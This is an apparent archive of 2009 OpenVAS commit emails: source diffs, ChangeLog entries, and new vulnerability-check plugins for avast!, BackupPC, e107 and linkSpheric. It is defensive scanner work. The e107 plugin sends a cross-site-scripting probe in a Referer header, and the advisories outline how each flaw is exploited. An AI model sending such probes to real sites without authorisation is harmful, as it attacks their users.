Axel Nennker 20020418 + * + * modified by Axel Nennker 20020418 * do not need gtk here * removed gcc -Wall complaints, NULL pointer checks */ @@ -95,11 +95,11 @@ signal(SIGTERM, cli_sigterm); g_cli = cli; - cli->backend = backend; + cli->backend = backend; while(!finished) { - /* I don't think buf[0] == 0 is a case that will happen, but just + /* I don't think buf[0] == 0 is a case that will happen, but just * to be safe, as it was the previous semantics */ if(network_gets(Context->socket, buf, sizeof(buf) - 1) < 0 || buf[0] == '\0') @@ -200,7 +200,7 @@ } -void +void cli_args_target (struct cli_args * args, char * target) { if (args->target) @@ -230,7 +230,7 @@ ftype = "nbe"; } } - else + else ftype++; args->extension = strdup(ftype); @@ -260,7 +260,7 @@ * @see arglist_to_latex * @see arglist_to_html * @see arglist_to_html_graph - * @see arglist_to_text + * @see arglist_to_text */ void cli_args_output (struct cli_args * args, char * type) @@ -429,11 +429,11 @@ printf("'%s', ", m); efree(&m); - m = sql_addslashes(p->family); + m = sql_addslashes(p->family); printf("'%s', ", m); efree(&m); - m = sql_addslashes(p->category); + m = sql_addslashes(p->category); printf("'%s', ", m); efree(&m); @@ -614,7 +614,7 @@ printf("%s = %s\n", p->name, (char*)p->value); break; } - p = p->next; + p = p->next; } if(Context->plugins)_cli_dump_pprefs(Context->plugins); From scm-commit at wald.intevation.org Wed Oct 7 16:00:28 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Wed, 7 Oct 2009 16:00:28 +0200 (CEST) Subject: [Openvas-commits] r5433 - in trunk/openvas-client: . openvas openvas/prefs_dialog Message-ID: <20091007140028.479C9851A581@pyrosoma.intevation.org> Author: mattm Date: 2009-10-07 16:00:26 +0200 (Wed, 07 Oct 2009) New Revision: 5433 Modified: trunk/openvas-client/ChangeLog trunk/openvas-client/openvas/cli.c trunk/openvas-client/openvas/prefs_dialog/prefs_dialog_auth.c Log: * openvas/prefs_dialog/prefs_dialog_auth.c (prefs_dialog_auth_do_connect): Add const to return and err. (prefs_dialog_auth_connect_dialog): Add const to err. * openvas/cli.c (cli_connect_to_scanner): Add const to err. Modified: trunk/openvas-client/ChangeLog =================================================================== --- trunk/openvas-client/ChangeLog 2009-10-07 13:57:34 UTC (rev 5432) +++ trunk/openvas-client/ChangeLog 2009-10-07 14:00:26 UTC (rev 5433) @@ -1,5 +1,13 @@ 2009-10-07 Matthew Mundell + * openvas/prefs_dialog/prefs_dialog_auth.c (prefs_dialog_auth_do_connect): + Add const to return and err. + (prefs_dialog_auth_connect_dialog): Add const to err. + + * openvas/cli.c (cli_connect_to_scanner): Add const to err. + +2009-10-07 Matthew Mundell + * openvas/cli.c: Flush trailing whitespace. 2009-10-07 Matthew Mundell Modified: trunk/openvas-client/openvas/cli.c =================================================================== --- trunk/openvas-client/openvas/cli.c 2009-10-07 13:57:34 UTC (rev 5432) +++ trunk/openvas-client/openvas/cli.c 2009-10-07 14:00:26 UTC (rev 5433) @@ -314,7 +314,7 @@ int cli_connect_to_scanner (struct cli_args * cli) { - char * err; + const char * err; prefs_set_string(Context, "nessusd_host", cli->server); prefs_set_int(Context, "nessusd_port", cli->port); prefs_set_string(Context, "nessusd_user", cli->login); Modified: trunk/openvas-client/openvas/prefs_dialog/prefs_dialog_auth.c =================================================================== --- trunk/openvas-client/openvas/prefs_dialog/prefs_dialog_auth.c 2009-10-07 13:57:34 UTC (rev 5432) +++ trunk/openvas-client/openvas/prefs_dialog/prefs_dialog_auth.c 2009-10-07 14:00:26 UTC (rev 5433) @@ -189,7 +189,7 @@ } -char * +const char * prefs_dialog_auth_do_connect (struct context *context, gpointer ctrls) { void *context_window = arg_get_value(MainDialog, "CONTEXT"); @@ -199,7 +199,7 @@ GtkWidget *vbox; GtkWidget *label; gchar *text; - char *err; + const char *err; int i; if(context_window) @@ -532,7 +532,7 @@ int port; const char *username; const char *password; - char *err; + const char *err; const char *trusted_ca; const char *cert_file; const char *key_file; From scm-commit at wald.intevation.org Wed Oct 7 17:28:01 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Wed, 7 Oct 2009 17:28:01 +0200 (CEST) Subject: [Openvas-commits] r5434 - in trunk/openvas-client: . openvas/prefs_dialog Message-ID: <20091007152801.9AF95865F49C@pyrosoma.intevation.org> Author: mattm Date: 2009-10-07 17:28:00 +0200 (Wed, 07 Oct 2009) New Revision: 5434 Modified: trunk/openvas-client/ChangeLog trunk/openvas-client/openvas/prefs_dialog/prefs_scope_tree.c Log: * openvas/prefs_dialog/prefs_scope_tree.c [USE_OMP] (create_omp_scope): Ensure RC contains correct name. Free strings used to set ID in RC. Modified: trunk/openvas-client/ChangeLog =================================================================== --- trunk/openvas-client/ChangeLog 2009-10-07 14:00:26 UTC (rev 5433) +++ trunk/openvas-client/ChangeLog 2009-10-07 15:28:00 UTC (rev 5434) @@ -1,5 +1,10 @@ 2009-10-07 Matthew Mundell + * openvas/prefs_dialog/prefs_scope_tree.c [USE_OMP] (create_omp_scope): + Ensure RC contains correct name. Free strings used to set ID in RC. + +2009-10-07 Matthew Mundell + * openvas/prefs_dialog/prefs_dialog_auth.c (prefs_dialog_auth_do_connect): Add const to return and err. (prefs_dialog_auth_connect_dialog): Add const to err. Modified: trunk/openvas-client/openvas/prefs_dialog/prefs_scope_tree.c =================================================================== --- trunk/openvas-client/openvas/prefs_dialog/prefs_scope_tree.c 2009-10-07 14:00:26 UTC (rev 5433) +++ trunk/openvas-client/openvas/prefs_dialog/prefs_scope_tree.c 2009-10-07 15:28:00 UTC (rev 5434) @@ -983,8 +983,62 @@ return -3; } - // FIX ensure name is set in openvasrc? + /* Hack to ensure name in openvasrc. */ + pref = rc_preference (rcfile, "name"); + if (pref && (strcmp (pref, name) == 0)) + g_free (pref); + else + { + char *pos; + gchar *rc; + gsize rc_len; + GString *string; + GError *error; + + error = NULL; + g_file_get_contents (file_name, &rc, &rc_len, &error); + if (error) + { + show_error (_("%s: g_file_get_contents"), __FUNCTION__); + // FIX note error + g_error_free (error); + g_free (file_name); + return -4; + } + + pos = strchr (rc, '\n'); + if (pos) + { + *pos = '\0'; + string = g_string_new (rc); + /* The first \n ensures that "name" begins a line. */ + g_string_append_printf (string, "\nname = %s\n", name); + g_string_append (string, pos + 1); + } + else + { + string = g_string_new (rc); + /* The first \n ensures that "name" begins a line. */ + g_string_append_printf (string, "\nname = %s\n", name); + } + + g_free (rc); + rc = g_string_free (string, FALSE); + + error = NULL; + g_file_set_contents (file_name, (gchar*) rc, strlen (rc), &error); + g_free (rc); + if (error) + { + show_error (_("%s: g_file_get_contents"), __FUNCTION__); + // FIX note error + g_error_free (error); + g_free (file_name); + return -5; + } + } + /* Hack to ensure ID in openvasrc. */ pref = rc_preference (rcfile, "id"); @@ -993,7 +1047,7 @@ else { char *pos; - gchar *rc, *rc2; + gchar *rc; gsize rc_len; GString *string; GError *error; @@ -1025,10 +1079,12 @@ g_string_append_printf (string, "\nid = %s\n", id); } - rc2 = g_string_free (string, FALSE); + g_free (rc); + rc = g_string_free (string, FALSE); error = NULL; - g_file_set_contents (file_name, (gchar*) rc2, strlen (rc2), &error); + g_file_set_contents (file_name, (gchar*) rc, strlen (rc), &error); + g_free (rc); if (error) { show_error (_("%s: g_file_get_contents"), __FUNCTION__); From scm-commit at wald.intevation.org Wed Oct 7 17:35:56 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Wed, 7 Oct 2009 17:35:56 +0200 (CEST) Subject: [Openvas-commits] r5435 - in trunk/openvas-manager: . src Message-ID: <20091007153556.A6927861EAB4@pyrosoma.intevation.org> Author: mattm Date: 2009-10-07 17:35:56 +0200 (Wed, 07 Oct 2009) New Revision: 5435 Modified: trunk/openvas-manager/ChangeLog trunk/openvas-manager/src/tasks_sql.h Log: * src/tasks_sql.h (make_task_rcfile): Remove append of name. Modified: trunk/openvas-manager/ChangeLog =================================================================== --- trunk/openvas-manager/ChangeLog 2009-10-07 15:28:00 UTC (rev 5434) +++ trunk/openvas-manager/ChangeLog 2009-10-07 15:35:56 UTC (rev 5435) @@ -1,6 +1,10 @@ +2009-10-07 Matthew Mundell + + * src/tasks_sql.h (make_task_rcfile): Remove append of name. + 2009-10-06 Tim Brown - * src/otp.c: Fixed memoey leak. + * src/otp.c: Fixed memory leak. 2009-10-06 Matthew Mundell Modified: trunk/openvas-manager/src/tasks_sql.h =================================================================== --- trunk/openvas-manager/src/tasks_sql.h 2009-10-07 15:28:00 UTC (rev 5434) +++ trunk/openvas-manager/src/tasks_sql.h 2009-10-07 15:35:56 UTC (rev 5435) @@ -1612,8 +1612,6 @@ preference_iterator_value (&prefs)); cleanup_iterator (&prefs); - g_string_append_printf (buffer, "name = %s\n", name); - /* Targets for general preferences. */ hosts = target_hosts (target); From scm-commit at wald.intevation.org Thu Oct 8 08:22:35 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Thu, 8 Oct 2009 08:22:35 +0200 (CEST) Subject: [Openvas-commits] r5436 - in trunk/openvas-plugins: . scripts Message-ID: <20091008062235.5E7E5861EACA@pyrosoma.intevation.org> Author: chandra Date: 2009-10-08 08:22:29 +0200 (Thu, 08 Oct 2009) New Revision: 5436 Added: trunk/openvas-plugins/scripts/gb_avast_av_detect_win.nasl trunk/openvas-plugins/scripts/gb_avast_av_mult_vuln_oct09_win.nasl trunk/openvas-plugins/scripts/gb_backuppc_clientnamealias_sec_bypass_vuln.nasl trunk/openvas-plugins/scripts/gb_backuppc_detect.nasl trunk/openvas-plugins/scripts/gb_e107_referer_xss_vuln.nasl trunk/openvas-plugins/scripts/gb_linkspheric_detect.nasl trunk/openvas-plugins/scripts/gb_linkspheric_viewlisting_sql_inj_vuln.nasl trunk/openvas-plugins/scripts/gb_phpgenealogie_detect.nasl trunk/openvas-plugins/scripts/gb_phpgenealogie_rfi_vuln.nasl Modified: trunk/openvas-plugins/ChangeLog trunk/openvas-plugins/cve_current.txt Log: Added new plugins Modified: trunk/openvas-plugins/ChangeLog =================================================================== --- trunk/openvas-plugins/ChangeLog 2009-10-07 15:35:56 UTC (rev 5435) +++ trunk/openvas-plugins/ChangeLog 2009-10-08 06:22:29 UTC (rev 5436) @@ -1,3 +1,16 @@ +2009-10-08 Chandrashekhar B + + * scripts/gb_phpgenealogie_detect.nasl, + scripts/gb_backuppc_clientnamealias_sec_bypass_vuln.nasl, + scripts/gb_phpgenealogie_rfi_vuln.nasl, + scripts/gb_linkspheric_detect.nasl, + scripts/gb_avast_av_mult_vuln_oct09_win.nasl, + scripts/gb_linkspheric_viewlisting_sql_inj_vuln.nasl, + scripts/gb_avast_av_detect_win.nasl, + scripts/gb_backuppc_detect.nasl, + scripts/gb_e107_referer_xss_vuln.nasl: + Added new plugins. + 2009-10-07 Jan-Oliver Wagner * scripts/webmirror.nasl: Added more information about Modified: trunk/openvas-plugins/cve_current.txt =================================================================== --- trunk/openvas-plugins/cve_current.txt 2009-10-07 15:35:56 UTC (rev 5435) +++ trunk/openvas-plugins/cve_current.txt 2009-10-08 06:22:29 UTC (rev 5436) @@ -73,14 +73,14 @@ CVE-2009-3328 SecPod CVE-2009-3327 SecPod CVE-2009-3330 SecPod svn R -CVE-2009-3369 SecPod +CVE-2009-3369 SecPod svn L CVE-2009-2817 SecPod svn L CVE-2009-3366 SecPod svn R CVE-2009-3367 Secpod svn R CVE-2009-3364 SecPod svn L CVE-2009-3340 SecPod svn L CVE-2009-3431 SecPod svn L -CVE-2009-3444 SecPod +CVE-2009-3444 SecPod svn R CVE-2009-3455 SecPod CVE-2009-3454 SecPod svn L CVE-2009-3456 SecPod svn L @@ -102,14 +102,20 @@ CVE-2009-3125 Greenbone svn R 36390 Greenbone svn R CVE-2009-3165 Greenbone svn R -CVE-2009-3523 SecPod -CVE-2009-3522 SecPod -CVE-2009-3524 SecPod +CVE-2009-3523 SecPod svn L +CVE-2009-3522 SecPod svn L +CVE-2009-3524 SecPod svn L CVE-2009-3518 SecPod CVE-2009-3510 SecPod -CVE-2009-3541 SecPod +CVE-2009-3541 SecPod svn R CVE-2009-3484 SecPod 36543 Greenbone svn R 36391 Greenbone svn R -CVE-2009-3545 SecPod - +CVE-2009-3545 SecPod +CVE-2009-3571 SecPod +CVE-2009-3570 SecPod +CVE-2009-3569 SecPod +CVE-2009-3544 SecPod +CVE-2009-3562 SecPod +CVE-2009-3561 SecPod +CVE-2009-3525 SecPod Added: trunk/openvas-plugins/scripts/gb_avast_av_detect_win.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_avast_av_detect_win.nasl 2009-10-07 15:35:56 UTC (rev 5435) +++ trunk/openvas-plugins/scripts/gb_avast_av_detect_win.nasl 2009-10-08 06:22:29 UTC (rev 5436) @@ -0,0 +1,78 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id: gb_avast_av_detect_win.nasl 5171 2009-10-06 16:57:29Z oct $ +# +# avast! AntiVirus Version Detection (Win) +# +# Authors: +# Sharath S +# +# Copyright: +# Copyright (c) 2009 Intevation GmbH, http://www.intevation.net +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if(description) +{ + script_id(801110); + script_version("$Revision: 1.0 $"); + script_name("avast! AntiVirus Version Detection (Win)"); + desc = " + Overview: This script detects the installed version of avast! AntiVirus + and sets the result in KB. + + Risk Factor: Informational"; + + script_description(desc); + script_summary("Set KB for the version of avast! AntiVirus"); + script_category(ACT_GATHER_INFO); + script_copyright("Copyright (C) 2009 Intevation GmbH"); + script_family("Service detection"); + script_dependencies("secpod_reg_enum.nasl"); + script_require_keys("SMB/WindowsVersion"); + script_require_ports(139, 445); + exit(0); +} + + +include("smb_nt.inc"); +include("secpod_smb_func.inc"); + +if(!get_kb_item("SMB/WindowsVersion")){ + exit(0); +} + +path1 = "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\"; + +foreach path (make_list("avast!", "avast5")) +{ + avastName = registry_get_sz(key:path1 + path, item:"DisplayName"); + + if(avastName =~ "avast! (Free )?Antivirus") + { + avastVer = registry_get_sz(key:path1 + path, item:"DisplayVersion"); + + if(!(avastVer =~ "^([0-9]\.[0-9]+\.[0-9]+\.[0-9]+)")) + { + avastPath = registry_get_sz(key:path1 + path, item:"DisplayIcon"); + share = ereg_replace(pattern:"([A-Z]):.*", replace:"\1$", string:avastPath); + file = ereg_replace(pattern:"[A-Z]:(.*)", replace:"\1", string:avastPath); + avastVer = GetVer(file:file, share:share); + } + if(!isnull(avastVer)){ + set_kb_item(name:"Avast!/AV/Win/Ver", value:avastVer); + } + } +} Property changes on: trunk/openvas-plugins/scripts/gb_avast_av_detect_win.nasl ___________________________________________________________________ Name: svn:executable + * Added: trunk/openvas-plugins/scripts/gb_avast_av_mult_vuln_oct09_win.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_avast_av_mult_vuln_oct09_win.nasl 2009-10-07 15:35:56 UTC (rev 5435) +++ trunk/openvas-plugins/scripts/gb_avast_av_mult_vuln_oct09_win.nasl 2009-10-08 06:22:29 UTC (rev 5436) @@ -0,0 +1,90 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id: gb_avast_av_mult_vuln_oct09_win.nasl 5171 2009-10-06 16:31:26Z oct $ +# +# avast! Multiple Vulnerabilities - Oct09 (Win) +# +# Authors: +# Sharath S +# +# Copyright: +# Copyright (c) 2009 Intevation GmbH, http://www.intevation.net +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if(description) +{ + script_id(801111); + script_version("$Revision: 1.0 $"); + script_cve_id("CVE-2009-3522", "CVE-2009-3523", "CVE-2009-3524"); + script_bugtraq_id(36507); + script_name("avast! Multiple Vulnerabilities - Oct09 (Win)"); + desc = " + Overview: This host is installed with avast! AntiVirus and is prone to multiple + vulnerabilities. + + Vulnerability Insight: + - A boundary error exists in the 'aswMon2' kernel driver when processing + IOCTLs. This can be exploited to cause a stack-based buffer overflow + via a specially crafted 0xB2C80018 IOCTL. + - An error in the 'AavmKer4.sys' kernel driver that can be exploited to + corrupt memory via a specially crafted 0xB2D6000C or 0xB2D60034 IOCTL. + - An unspecified error exists in the ashWsFtr.dll library which can be + exploited to cause unknow impact. + + Impact: + Successful exploitation will let the local attackers to cause a Denial of + Service or gain escalated privileges on the victim's system. + + Impact Level: System/Application + + Affected Software/OS: + avast! Home and Professional version prior to 4.8.1356 on Windows + + Fix: Upgrade to avast! version 4.8.1356 or later + http://www.avast.com/eng/download.html + + References: + http://secunia.com/advisories/36858/ + http://www.securityfocus.com/archive/1/506681 + http://www.vupen.com/english/advisories/2009/2761 + + CVSS Score: + CVSS Base Score : 7.2 (AV:L/AC:L/Au:NR/C:C/I:C/A:C) + CVSS Temporal Score : 5.6 + Risk factor: High"; + + script_description(desc); + script_summary("Check the version of avas ! Antivirus"); + script_category(ACT_GATHER_INFO); + script_copyright("Copyright (C) 2009 Intevation GmbH"); + script_family("Buffer overflow"); + script_dependencies("gb_avast_av_detect_win.nasl"); + script_require_keys("Avast!/AV/Win/Ver"); + exit(0); +} + + +include("version_func.inc"); + +avastVer = get_kb_item("Avast!/AV/Win/Ver"); +if(isnull(avastVer)){ + exit(0); +} + +# Check for avast! versions prior to 4.8.1356 +if(version_is_less(version:avastVer, test_version:"4.8.1356")){ + security_hole(0); +} Property changes on: trunk/openvas-plugins/scripts/gb_avast_av_mult_vuln_oct09_win.nasl ___________________________________________________________________ Name: svn:executable + * Added: trunk/openvas-plugins/scripts/gb_backuppc_clientnamealias_sec_bypass_vuln.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_backuppc_clientnamealias_sec_bypass_vuln.nasl 2009-10-07 15:35:56 UTC (rev 5435) +++ trunk/openvas-plugins/scripts/gb_backuppc_clientnamealias_sec_bypass_vuln.nasl 2009-10-08 06:22:29 UTC (rev 5436) @@ -0,0 +1,97 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id: gb_backuppc_clientnamealias_sec_bypass_vuln.nasl 5063 2009-10-06 17:52:24Z oct $ +# +# BackupPC 'ClientNameAlias' Function Security Bypass Vulnerability +# +# Authors: +# Sharath S +# +# Copyright: +# Copyright (c) 2009 Intevation GmbH, http://www.intevation.net +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if(description) +{ + script_id(801107); + script_version("$Revision: 1.0 $"); + script_cve_id("CVE-2009-3369"); + script_name("BackupPC 'ClientNameAlias' Function Security Bypass Vulnerability"); + desc = " + Overview: This host has BackupPC intallation and is prone to security bypass + vulnerability. + + Vulnerability Insight: + The security issue is caused due to the application allowing users to set the + 'ClientNameAlias' option for configured hosts. This can be exploited to backup + arbitrary directories from client systems for which Rsync over SSH is + configured as a transfer method. + + Impact: + Successful attacks may allow remote authenticated users to read and write + sensitive files by modifying ClientNameAlias to match another system, then + initiating a backup or restore on the victim's system. + + Impact Level: System + + Affected Software/OS: + BackupPC version 3.1.0 and prior. + + Fix: + No solution or patch is available as on 06th October, 2009. Information + regarding this issue will be updated once the solution details are available. + For updates refer, http://backuppc.sourceforge.net/ + or + For Debian platform Update to version 3.1.0-7 from below link, + https://launchpad.net/debian/+source/backuppc/3.1.0-7 + http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=542218 + + ***** + NOTE: Ignore this warning if above mentioned patch is already applied. + ***** + + References: + http://osvdb.org/57236 + http://secunia.com/advisories/36393 + http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=542218 + + CVSS Score: + CVSS Base Score : 8.5 (AV:N/AC:M/Au:SI/C:C/I:C/A:C) + CVSS Temporal Score : 6.3 + Risk factor: High"; + + script_description(desc); + script_summary("Check for the version of BackupPC"); + script_category(ACT_GATHER_INFO); + script_copyright("Copyright (C) 2009 Intevation GmbH"); + script_family("General"); + script_dependencies("gb_backuppc_detect.nasl"); + script_require_keys("BackupPC/Ver"); + exit(0); +} + + +include("version_func.inc"); + +backuppcVer = get_kb_item("BackupPC/Ver"); +if(backuppcVer) +{ + # Check for BackupPC version <= 3.1.0 + if(version_in_range(version:backuppcVer, test_version:"3.0", + test_version2:"3.1.0")){ + security_hole(0); + } +} Property changes on: trunk/openvas-plugins/scripts/gb_backuppc_clientnamealias_sec_bypass_vuln.nasl ___________________________________________________________________ Name: svn:executable + * Added: trunk/openvas-plugins/scripts/gb_backuppc_detect.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_backuppc_detect.nasl 2009-10-07 15:35:56 UTC (rev 5435) +++ trunk/openvas-plugins/scripts/gb_backuppc_detect.nasl 2009-10-08 06:22:29 UTC (rev 5436) @@ -0,0 +1,65 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id: gb_backuppc_detect.nasl 5063 2009-10-06 16:05:29Z oct $ +# +# BackupPC Version Detection +# +# Authors: +# Sharath S +# +# Copyright: +# Copyright (c) 2009 Intevation GmbH, http://www.intevation.net +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if(description) +{ + script_id(801106); + script_version("$Revision: 1.0 $"); + script_name("BackupPC Version Detection"); + desc = " + Overview: This script detects the installed version of BackupPC and + sets the reuslt in KB. + + Risk Factor: Informational"; + + script_description(desc); + script_summary("Set KB for the version of BackupPC"); + script_category(ACT_GATHER_INFO); + script_copyright("Copyright (C) 2009 Intevation GmbH"); + script_family("Service detection"); + exit(0); +} + + +include("ssh_func.inc"); +include("version_func.inc"); + +backupSock = ssh_login_or_reuse_connection(); +if(!backupSock){ + exit(0); +} + +backupName = find_bin(prog_name:"BackupPC", sock:backupSock); +foreach binName (backupName) +{ + backupVer = get_bin_version(full_prog_name:"cat", version_argv:binName, + ver_pattern:"Version ([0-9]\.[0-9]\.[0-9]+"+ + "(beta[0-9])?)", sock:backupSock); + if(backupVer[1] != NULL){ + set_kb_item(name:"BackupPC/Ver", value:backupVer[1]); + } +} +ssh_close_connection(); Property changes on: trunk/openvas-plugins/scripts/gb_backuppc_detect.nasl ___________________________________________________________________ Name: svn:executable + * Added: trunk/openvas-plugins/scripts/gb_e107_referer_xss_vuln.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_e107_referer_xss_vuln.nasl 2009-10-07 15:35:56 UTC (rev 5435) +++ trunk/openvas-plugins/scripts/gb_e107_referer_xss_vuln.nasl 2009-10-08 06:22:29 UTC (rev 5436) @@ -0,0 +1,102 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id: gb_e107_referer_xss_vuln.nasl 5050 2009-10-06 16:29:41Z oct $ +# +# e107 'Referer' Header Cross-Site Scripting Vulnerability +# +# Authors: +# Nikita MR +# +# Copyright: +# Copyright (c) 2009 Intevation GmbH, http://www.intevation.net +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if(description) +{ + script_id(800946); + script_version("$Revision: 1.0 $"); + script_cve_id("CVE-2009-3444"); + script_name("e107 'Referer' Header Cross-Site Scripting Vulnerability"); + desc = " + Overview: This host is running e107 and is prone to remote Cross-Site + Scripting vulnerability. + + Vulnerability Insight: + The flaw exists due to error in 'email.php' in 'news.1' action. It does not + properly filter HTML code from user-supplied input in the HTTP 'Referer' + header before displaying the input. + + Impact: + Attackers can exploit this issue to execute arbitrary HTML and script code + in a user's browser session in the context of an affected site. + + Impact Level: Application + + Affected Software/OS: + e107 version 0.7.16 and prior. + + Fix: + No solution/patch is available as on 06th , October 2009. Information + regarding this issue will updated once the solution details are available. + For updates refer, http://e107.org/edownload.php + + References: + http://websecurity.com.ua/3528/ + http://www.vulnaware.com/?p=17929 + http://secunia.com/advisories/36832/ + + CVSS Score: + CVSS Base Score : 4.3 (AV:N/AC:M/Au:NR/C:N/I:P/A:N) + CVSS Temporal Score : 3.9 + Risk factor: Medium"; + + script_description(desc); + script_summary("Validate through the attack string"); + script_category(ACT_MIXED_ATTACK); + script_copyright("Copyright (C) 2009 Intevation GmbH"); + script_family("Web application abuses"); + script_dependencies("http_version.nasl"); + script_require_ports("Services/www", 80); + exit(0); +} + + +include("http_func.inc"); + +ePort = get_http_port(default:80); +if(!ePort){ + exit(0); +} + +if(safe_checks()){ + exit(0); +} + +foreach dir (make_list("/", "/e107", "/cms", cgi_dirs())) +{ + sndReq = string('GET ' + dir + '/email.php?news.1 HTTP/1.1\r\n', + 'Host: ', get_host_name(),'\r\n', + 'Referer: >\r\n', + '\r\n'); + + rcvRes = http_send_recv(port:ePort, data:sndReq); + if(egrep(pattern:"^HTTP/.* 200 OK", string:rcvRes) && + "alert(document.cookie)" >< rcvRes) + { + security_warning(ePort); + exit(0); + } +} Property changes on: trunk/openvas-plugins/scripts/gb_e107_referer_xss_vuln.nasl ___________________________________________________________________ Name: svn:executable + * Added: trunk/openvas-plugins/scripts/gb_linkspheric_detect.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_linkspheric_detect.nasl 2009-10-07 15:35:56 UTC (rev 5435) +++ trunk/openvas-plugins/scripts/gb_linkspheric_detect.nasl 2009-10-08 06:22:29 UTC (rev 5436) @@ -0,0 +1,86 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id: gb_linkspheric_detect.nasl 5169 2009-10-08 10:10:24Z oct $ +# +# linkSpheric Version Detection +# +# Authors: +# Sharath S +# +# Copyright: +# Copyright (c) 2009 Intevation GmbH, http://www.intevation.net +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if(description) +{ + script_id(801112); + script_version("$Revision: 1.0 $"); + script_name("linkSpheric Version Detection"); + desc = " + Overview: This script detects the installed version of linkSpheric and + sets the result in KB. + + Risk factor: Informational"; + + script_description(desc); + script_summary("Set version of linkSpheric in KB"); + script_category(ACT_GATHER_INFO); + script_copyright("Copyright (C) 2009 Intevation GmbH"); + script_family("Service detection"); + script_dependencies("http_version.nasl"); + script_require_ports("Services/www", 80); + exit(0); +} + + +include("http_func.inc"); + +spheric_port = get_http_port(default:80); +if(!spheric_port){ + spheric_port = 80; +} + +if(!get_port_state(spheric_port)){ + exit(0); +} + +foreach dir (make_list("/linkSpheric", "/Spheric", "/", cgi_dirs())) +{ + sndReq = http_get(item:dir + "/admin/index.php", port:spheric_port); + rcvRes = http_send_recv(port:spheric_port, data:sndReq); + + if("linkSpheric" >< rcvRes ) + { + version = eregmatch(pattern:"linkSpheric version ([0-9.]+( Beta [0-9.])?)", + string:rcvRes, icase:1); + if(isnull(version)) + { + sndReq = http_get(item:dir + "/CHANGELOG", port:spheric_port); + rcvRes = http_send_recv(port:spheric_port, data:sndReq); + version = egrep(pattern:"version [0-9.]+[a-z0-9 ]+(release)", + string:rcvRes, icase:1); + version = eregmatch(pattern:"version ([0-9.]+( Beta [0-9])?)", + string:version, icase:1); + } + spheric_ver[1] = ereg_replace(pattern:" ", replace:".", string:version[1]); + + if(!isnull(spheric_ver[1])) + { + set_kb_item(name:"www/" + spheric_port + "/linkSpheric", + value:spheric_ver[1] + " under " + dir); + } + } +} Property changes on: trunk/openvas-plugins/scripts/gb_linkspheric_detect.nasl ___________________________________________________________________ Name: svn:executable + * Added: trunk/openvas-plugins/scripts/gb_linkspheric_viewlisting_sql_inj_vuln.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_linkspheric_viewlisting_sql_inj_vuln.nasl 2009-10-07 15:35:56 UTC (rev 5435) +++ 